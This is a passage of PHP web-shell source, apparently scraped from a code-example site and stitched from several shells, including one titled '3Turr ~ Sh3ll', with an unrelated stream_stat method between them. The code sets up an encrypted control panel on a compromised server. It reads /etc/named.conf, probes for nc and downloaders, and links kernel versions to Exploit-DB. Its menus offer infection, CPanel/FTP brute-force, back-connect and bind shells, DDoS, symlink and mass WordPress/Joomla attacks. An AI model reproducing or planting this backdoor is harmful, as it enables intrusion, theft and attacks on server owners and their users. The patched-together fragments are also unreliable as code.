th\t{text-align:left;background-color:#060a10;}\n\t.main tr:hover{background-color:#354252;}\n\t.main td, th{vertical-align:middle;}\n\tinput[type='submit']{background-color:#2E6E9C;}\n\tinput[type='button']{background-color:#2E6E9C;}\n\tinput[type='submit']:hover{background-color:#56AD15;}\n\tinput[type='button']:hover{background-color:#56AD15;}\n\t.l1\t\t\t{background-color:#1e252f;}\n\tpre\t\t\t{font:9pt Courier New;}\n</style>\n<script>\n    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\n    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n    var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n    var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n    var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n    var d = document;\n\t\n\tfunction encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}\n\tfunction utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\n\tfunction base64_encode(data){var b64 = 
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}\n\tfunction set(a,c,p1,p2,p3,charset) {\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\td.mf.a.value = encrypt(d.mf.a.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.c.value = encrypt(d.mf.c.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p1.value = encrypt(d.mf.p1.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p2.value = encrypt(d.mf.p2.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p3.value = encrypt(d.mf.p3.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t}\n\tfunction g(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\td.mf.submit();\n\t}\n\tfunction a(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\tvar params = 'ajax=true';\n\t\tfor(i=0;i<d.mf.elements.length;i++)\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . 
"', params);\n\t}\n\tfunction sr(url, params) {\n\t\tif (window.XMLHttpRequest)\n\t\t\treq = new XMLHttpRequest();\n\t\telse if (window.ActiveXObject)\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\n        if (req) {\n            req.onreadystatechange = processReqChange;\n            req.open('POST', url, true);\n            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\n            req.send(params);\n        }\n\t}\n\tfunction processReqChange() {\n\t\tif( (req.readyState == 4) )\n\t\t\tif(req.status == 200) {\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\n\t\t\t\tvar arr=reg.exec(req.responseText);\n\t\t\t\teval(arr[2].substr(0, arr[1]));\n\t\t\t} else alert('Request error!');\n\t}\n</script>\n<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>\n<form method=post name=mf style='display:none;'>\n<input type=hidden name=a>\n<input type=hidden name=c>\n<input type=hidden name=p1>\n<input type=hidden name=p2>\n<input type=hidden name=p3>\n<input type=hidden name=charset>\n</form>";
    // NOTE(review): $freeSpace of 0 or false makes $totalSpace / $freeSpace in
    // the final echo a division by zero; only $totalSpace is guarded below.
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace ? $totalSpace : 1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    // Builds an outbound search link from the host's kernel name and release;
    // the link is routed through a referrer-stripping redirector.
    $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
    // NOTE(review): strpos() takes (haystack, needle); as written this searches
    // the literal 'Linux' for $kernel rather than the other way round.
    if (strpos('Linux', $kernel) !== false) {
        $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
    } else {
        $explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
    }
    // Without the posix functions the ids come from getmyuid()/getmygid() and
    // the group name is shown as "?"; with them the effective uid/gid are
    // resolved to names.
    if (!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    // One link per component of $GLOBALS['cwd']; each link's onclick carries the
    // path prefix up to that component. The path text is not escaped.
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n = count($path);
    for ($i = 0; $i < $n - 1; $i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for ($j = 0; $j <= $i; $j++) {
            $cwd_links .= $path[$j] . '/';
        }
        $cwd_links .= "\")'>" . $path[$i] . "/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach ($charsets as $▟) {
        $opt_charsets .= '<option value="' . $▟ . '" ' . ($_POST['charset'] == $▟ ? 'selected' : '') . '>' . $▟ . '</option>';
    }
    // Menu label => action name posted in field "a".
    $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Infect' => 'Infect', 'Sql' => 'Sql', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
    // "Logout" is only offered when the global under this key is non-empty.
    if (!empty($GLOBALS['▛'])) {
        $m['Logout'] = 'Logout';
    }
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach ($m as $k => $v) {
        $menu .= '<th>[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
    }
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach (range('c', 'z') as $drive) {
            if (is_dir($drive . ':\\')) {
                $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
            }
        }
    }
    /* (С) 08.2015 dmkcv */
    // Status table. The "Server IP" cell is gethostbyname($_SERVER["HTTP_HOST"]),
    // i.e. a DNS lookup on the client-supplied Host header, not SERVER_ADDR.
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q=' . urlencode(@php_uname()) . '" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#FFDB5F><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' (' . round(100 / ($totalSpace / $freeSpace), 2) . '%)<br>' . $cwd_links . ' ' . viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">' . $opt_charsets . '</select></label><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>';
}
Ejemplo n.º 26
 /**
  * Build the positional stat array reported for this stream.
  *
  * The 13 slots follow the order PHP's stat() uses: dev, ino, mode, nlink,
  * uid, gid, rdev, size, atime, mtime, ctime, blksize, blocks. uid and gid
  * come from getmyuid()/getmygid(), size is the byte length of the global
  * variable named by $this->varname, and the three timestamps are taken from
  * time() at call time.
  *
  * NOTE(review): mode is reported as 0, so no file-type or permission bits
  * are exposed to callers; confirm that is intended.
  *
  * @return array 13-element list in stat() order
  */
 function stream_stat()
 {
     $ownerUid = getmyuid();
     $ownerGid = getmygid();
     $byteLength = strlen($GLOBALS[$this->varname]);
     $accessed = time();
     $modified = time();
     $changed = time();
     return array(0, 0, 0, 0, $ownerUid, $ownerGid, 0, $byteLength, $accessed, $modified, $changed, -1, -1);
 }
    echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
    echo "</td><td>";
    echo "<font face=Verdana size=-2 color=red><b>";
    echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
    echo ws(3) . $sysctl . "<br>";
    echo ws(3) . ex('echo $OSTYPE') . "<br>";
    echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
    if (!empty($id)) {
        echo ws(3) . $id . "<br>";
    } else {
        if (function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) {
            $euserinfo = @posix_getpwuid(@posix_geteuid());
            $egroupinfo = @posix_getgrgid(@posix_getegid());
            echo ws(3) . 'uid=' . $euserinfo['uid'] . ' ( ' . $euserinfo['name'] . ' ) gid=' . $egroupinfo['gid'] . ' ( ' . $egroupinfo['name'] . ' )<br>';
        } else {
            echo ws(3) . "user="******" uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>";
        }
    }
    echo ws(3) . $dir;
    echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )';
    echo "</b></font>";
} else {
    echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :'******'<br>pwd :' . ws(1) . '</b></font><br>';
    echo "</td><td>";
    echo "<font face=Verdana size=-2 color=red><b>";
    echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
    echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
    echo ws(3) . @getenv("USERNAME") . "<br>";
    echo ws(3) . $dir;
    echo "<br></font>";
}
function yemenhead()
{
    if (empty($_POST['charset'])) {
        $_POST['charset'] = $GLOBALS['default_charset'];
    }
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace ? $totalSpace : 1;
    $on = "<font color=#0F0> ON </font>";
    $of = "<font color=red> OFF </font>";
    $none = "<font color=#0F0> NONE </font>";
    if (function_exists('curl_version')) {
        $curl = $on;
    } else {
        $curl = $of;
    }
    if (function_exists('mysql_get_client_info')) {
        $mysql = $on;
    } else {
        $mysql = $of;
    }
    if (function_exists('mssql_connect')) {
        $mssql = $on;
    } else {
        $mssql = $of;
    }
    if (function_exists('pg_connect')) {
        $pg = $on;
    } else {
        $pg = $of;
    }
    if (function_exists('oci_connect')) {
        $or = $on;
    } else {
        $or = $of;
    }
    if (@ini_get('disable_functions')) {
        $disfun = '<span>Disabled functions : </span><font color=red style="word-wrap: break-word;width: 80%; " >' . @str_replace(',', ', ', @ini_get('disable_functions')) . '</font>';
    } else {
        $disfun = "<span>Disabled Functions: </span><font color=#00ff00 >All Functions Enable</font>";
    }
    if (@ini_get('safe_mode')) {
        $safe_modes = "<font color=red>ON</font>";
    } else {
        $safe_modes = "<font color=#0F0 >OFF</font>";
    }
    if (@ini_get('open_basedir')) {
        $open_b = @ini_get('open_basedir');
    } else {
        $open_b = $none;
    }
    if (@ini_get('safe_mode_exec_dir')) {
        $safe_exe = @ini_get('safe_mode_exec_dir');
    } else {
        $safe_exe = $none;
    }
    if (@ini_get('safe_mode_include_dir')) {
        $safe_include = @ini_get('safe_mode_include_dir');
    } else {
        $safe_include = $none;
    }
    if (!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(posix_geteuid());
        $gid = @posix_getgrgid(posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n = count($path);
    for ($i = 0; $i < $n - 1; $i++) {
        $cwd_links .= "<a  href='#' onclick='g(\"FilesMan\",\"";
        for ($j = 0; $j <= $i; $j++) {
            $cwd_links .= $path[$j] . '/';
        }
        $cwd_links .= "\")'>" . $path[$i] . "/</a>";
    }
    $drives = "";
    foreach (range('c', 'z') as $drive) {
        if (is_dir($drive . ':')) {
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . base64_encode($drive . ':/') . '\')">[ ' . $drive . ' ]</a> ';
        }
    }
    echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>3Turr ~ Sh3ll</title>
<link rel="shortcut icon" type="image/x-icon" href="https://avatars1.githubusercontent.com/u/13343571?v=3&s=460">
<script language="javascript">
function Encoder(name)
{
	var e =  document.getElementById(name);
	e.value = btoa(e.value);
	return true;
}
function Encoder2(name)
{
	var e =  document.getElementById(name);
	e.value = btoa(e.value);
	return true;
}
</script>
<style type="text/css">
<!--
.headera { 
color: red;
}
.whole {
	
	height:auto;
	width: auto;
	margin-top: 10px;
	margin-right: 10px;
	margin-left: 10px;
    background-image: linear-gradient(
      rgba(0, 0, 0, 0.4), 
      rgba(0, 0, 0, 0.4)
    ), url(http://img03.arabsh.com/uploads/image/2012/09/11/0d37424266f70d.png);
}
.header {
table-layout: fixed;
	height: auto;
	width: auto;
	border:  4px solid #5BEEFF;
	color: yellow;
	font-size: 12px;
	font-family: Verdana, Geneva, sans-serif;
} 
tr {
  display: table-row;
  vertical-align: inherit;
  padding-right:10px;
}table {
  display: table;
  border-collapse: separate;
  border-spacing: 2px;
  border-color: #5BEEFF;
}
.header a {color:#0F0; text-decoration:none;}
span {
	font-weight: bolder;
	color: #FFF;
}
#meunlist {
	font-family: Verdana, Geneva, sans-serif;
	color: #FFF;
	background-color: #000;
	width: auto;
	border-right-width: 7px;
	border-left-width: 7px;
	border-top-style: solid;
	border-right-style: solid;
	border-bottom-style: solid;
	border-left-style: solid;
	border-color: #5BEEFF;
	height: auto;
	font-size: 12px;
	font-weight: bold;
	border-top-width: 0px;
}
  .whole #meunlist ul {
	padding-top: 5px;
	padding-right: 5px;
	padding-bottom: 7px;
	padding-left: 2px;
	text-align:center;
	list-style-type: none;
	margin: 0px;
}
  .whole #meunlist li {
	margin: 0px;
	padding: 0px;
	display: inline;
}
  .whole #meunlist a {
    font-family: arial, sans-serif;
	font-size: 14px;
	text-decoration:none;
	font-weight: bold;
	color: #fff;
	clear: both;
	width: 100px;
	margin-right: -6px;
	padding-top: 3px;
	padding-right: 15px;
	padding-bottom: 3px;
	padding-left: 15px;
	border-right-width: 1px;
	border-right-style: solid;
	border-right-color: #FFF;
}
  .whole #meunlist a:hover {
	color: red;
	background: #fff;
}
.menu a:hover {	background:#5BEEFF;}
a:hover        { color:red;background:black;} 
    .ml1        { border:1px solid #2438CF;padding:5px;margin:0;overflow: auto; } 
    .bigarea    { width:100%;height:250px; border:1px solid red; background:#171717;}
    input, textarea, select    { margin:0;color:#FF0000;background-color:#000;border:1px solid #5BEEFF; font: 9pt Monospace,"Times New roman"; } 
    form        { margin:0px; } 
    #toolsTbl    { text-align:center; } 
    .toolsInp    { width: 80%; } 
   .main th    {text-align:left;background-color:#990000;color:white;} 
 .main td, th{vertical-align:middle;} 
    pre            {font-family:Courier,Monospace;} 
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} 
}';
    if (is_writable($GLOBALS['cwd'])) {
        echo ".foottable {\n width: 300px;\n font-weight: bold;\n }";
    } else {
        echo ".foottable {\n width: 300px;\n font-weight: bold;\n background-color:red;\n }\n .dir {\n   background-color:red;  \n }\n ";
    }
    echo '.main th{text-align:left;}
 .main a{color: #FFF;}
 .main tr:hover{background-color:red;}
 .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
 .bigarea{ width:99%; height:300px; }   
  </style>
';
    echo "<script>\n var c_ = '" . base64_encode(htmlspecialchars($GLOBALS['cwd'])) . "';\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n var d = document;\n\tfunction set(a,c,p1,p2,p3,charset) {\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t}\n\tfunction g(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\td.mf.submit();\n\t}</script>";
    echo '
</head>
<div class="whole1"></div>
<body bgcolor="#000000"  color="red" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
 <div  style="position:absolute;top:30px;right:50px; font-size:25px;font-family:auto;z-index:-1;" rowspan="8"><font color=red><img height="190px" height="190px" alt="3Turr" src="http://i.imgur.com/mVdgU0V.png" /></font><center><font style="color:#5BEEFF;text-shadow: 1px 1px 36px #5BEEFF, 0 0 25px #5BEEFF, 0 0 30px #5BEEFF, 0 0 30px #5BEEFF;">3</font><font style="color:red;text-shadow: 1px 1px 36px red, 0 0 25px red, 0 0 30px red;">Turr</font>
</div>
<div class="whole">
<form method=post name=mf style="display:none;">
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>
  <div class="header"><table  class="headmain" width="100%" border="0"  align="lift">
  <tr>
 <td width="3%"><span>Uname:</span></td>
 <td colspan="2">' . substr(@php_uname(), 0, 120) . '</td>
 </tr>
  <tr>
 <td><span>User:</span></td>
 <td>' . $uid . ' [ ' . $user . ' ] <span>   Group: </span>' . $gid . ' [ ' . $group . ' ] 
  </tr>
  <tr>
 <td><span>PHP:</span></td>
 <td>' . @phpversion() . '   <span>   Safe Mode: ' . $safe_modes . '</span></td>
 </tr>
  <tr>
 <td><span>IP:</span></td>
 <td>' . @$_SERVER["SERVER_ADDR"] . '    <span>Server IP:</span> ' . @$_SERVER["REMOTE_ADDR"] . '</td>
  </tr>
  <tr>
 <td><span>WEBS:</span></td>
 <td width="76%">';
    if ($GLOBALS['sys'] == 'unix') {
        $d0mains = @file("/etc/named.conf");
        if (!$d0mains) {
            echo "CANT READ named.conf";
        } else {
            $count;
            foreach ($d0mains as $d0main) {
                if (@ereg("zone", $d0main)) {
                    preg_match_all('#zone "(.*)"#', $d0main, $domains);
                    flush();
                    if (strlen(trim($domains[1][0])) > 2) {
                        flush();
                        $count++;
                    }
                }
            }
            echo "<b>{$count}</b>  Domains";
        }
    } else {
        echo "CANT READ |Windows|";
    }
    echo '</td>
 </tr>
 <tr>
 <td height="16"><span>HDD:</span></td>
 <td>' . yemenSize($totalSpace) . ' <span>Free:</span>' . yemenSize($freeSpace) . ' [' . (int) ($freeSpace / $totalSpace * 100) . '%]</td>
 </tr>';
    if ($GLOBALS['sys'] == 'unix') {
        if (!@ini_get('safe_mode')) {
            echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
            $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
            foreach ($userful as $item) {
                if (yemenWhich($item)) {
                    echo $item . ',';
                }
            }
            echo '</td>
 </tr>
  <tr>
  <td height="0" colspan="2"><span>Downloader: </span>';
            $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
            foreach ($downloaders as $item2) {
                if (yemenWhich($item2)) {
                    echo $item2 . ',';
                }
            }
            echo '</td>
   </tr>';
        } else {
            echo '<tr><td height="18" colspan="2"><span>useful: </span>';
            echo '--------------</td>
   </tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td>
   </tr>';
        }
    } else {
        echo '<tr><td height="18" colspan="2"><span>Window: </span>';
        echo yemenEx('ver');
    }
    echo '<tr>
  <td height="16" colspan="2">' . $disfun . '</td>
  </tr>
  <tr>
 <td height="16" colspan="2"><span>cURL:' . $curl . '  MySQL:' . $mysql . '  MSSQL:' . $mssql . '  PostgreSQL:' . $pg . '  Oracle: </span>' . $or . '</td><td width="15%"></td>
  </tr>
  <tr>
  <td height="11" style="width:70%" colspan="3"><span>Open_basedir:' . $open_b . ' Safe_mode_exec_dir:' . $safe_exe . '   Safe_mode_include_dir:' . $safe_include . '</td>
  </tr>
  <tr>
 <td height="11"><span>Server </span></td>
 <td colspan="2">' . @getenv('SERVER_SOFTWARE') . '</td>
  </tr>';
    if ($GLOBALS[sys] == "win") {
        echo '<tr>
 <td height="12"><span>DRIVE:</span></td>
 <td colspan="2">' . $drives . '</td>
  </tr>';
    }
    echo '<tr>
 <td height="12"><span>PWD:</span></td>
 <td colspan="2" >' . $cwd_links . '  <a href=# onclick="g(\'FilesMan\',\'' . base64_encode($GLOBALS['home_cwd']) . '\')"><font color=red >[HOME]</font></a></td>
  </tr>
  </table>
</div>
 <div id="menu-box">
<style type="text/css">
div#menu{height:40px;:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-bg.png) repeat-x;}
div#menu ul{margin:0;padding:0;list-style:none;float:left;}
div#menu ul.menu {padding-left:10px;}
div#menu li{position:relative;z-index:9;margin:0;padding:0 5px 0 0;display:block;float:left;}
div#menu li:hover>ul {left:-2px;}
div#menu a {position:relative;z-index:10;height:40px;display:block;float:left;line-height:40px;text-decoration:none;font:normal 13px Trebuchet MS;}
div#menu a:hover {color:#000;}
div#menu li.current a {}
div#menu span {display:block;cursor:pointer;background-repeat:no-repeat;background-position:95% 0;}
div#menu ul ul a.parent span {background-position:95% 8px;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer.gif);}
div#menu ul ul a.parent:hover span {background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer-mover.gif);}
div#menu a {padding:0 6px 0 10px;line-height:30px;color:#fff;}
div#menu span {margin-top:5px;}
div#menu li {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-delimiter.png) 98% 4px no-repeat;}
div#menu li.last {background:none;}
div#menu ul ul li {background:none;}
div#menu ul ul {position:absolute;top:38px;left:-999em;width:180%;padding:1px 0 0 0;background:rgb(45,45,45);margin-top:1px;}
div#menu ul ul a {padding:0 0 0 15px;height:auto;float:none;display:block;line-height:24px;color:rgb(169,169,169);}
div#menu ul ul span {margin-top:0;padding-right:15px;_padding-right:20px;color:rgb(169,169,169);}
div#menu ul ul a:hover span {color:#fff;}div#menu ul ul li.last {background:none;}
div#menu ul ul li {width:100%;}div#menu ul ul ul {padding:1;margin:-38px 0 0 163px !important;margin-left:172px;}div#menu ul ul ul {background:rgb(41,41,41);}
div#menu ul ul ul ul {background:rgb(38,38,38);}div#menu ul ul ul ul {background:rgb(35,35,35);}
div#menu li.back {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat right -44px !important;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);width:13px;height:44px;z-index:8;position:absolute;margin:-1px 0 0 -5px;}
div#menu li.back .left {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat top left !important;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);height:44px;margin-right:8px;}
</style>
<div id="menu"><ul class="menu">
 
<li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
<li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">SYSTEM</a></li>
<li><a href="#">PHP</a>
<ul>
 <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
<li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
</ul>
<li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
<li><a href="#" >BRUTE&CRACK</a>
<ul>
 <li><a href="#" onclick="g(\'bf\',null,\'\',\'\',\'\')">CPanel</a></li>
<li><a href="#" onclick="g(\'bruteftp\',null,\'\',\'\',\'\')">FTP</a></li>
</ul>
</li>
<li><a href="#">NETWORK</a>
<ul>
<li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">BACK CONNECT</a></li>
<li><a href="#" onclick="g(\'net\',null,\'\',\'\',\'\')">BIND PORT</a></li>
</ul>
<li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
<li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
<li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
<!--
<li><a href="#" onclick="g(\'wp\',null,\'\',\'\',\'\')">Mass Wpress</a></li>
<li><a href="#" onclick="g(\'joom\',null,\'\',\'\',\'\')">Mass Joomla</a></li>
-->
<li><a href="#">Perl Sh3ll</a>
	<ul>
		<li><a href="#" onclick="g(\'perl\',null,\'\',\'\',\'\')">CGI 1.0v</a></li>
		<li><a href="#" onclick="g(\'perl4\',null,\'\',\'\',\'\')">CGI 1.4v</a></li>
	</ul>
</li>
<li><a href="#" >Mirrors</a>
<ul>
 <li><a href="#" onclick="g(\'zone\',null,\'\',\'\',\'\')">Zone-h.org</a></li>
  <li><a href="#" onclick="g(\'zonejoy\',null,\'\',\'\',\'\')">Aljyyosh.org</a></li>
</ul>
</li>
<li><a href="#">TOOLS</a>
<ul>
  <li><a href="#" onclick="g(\'rev\',null,\'\',\'\',\'\')">Reverse IP</a></li>
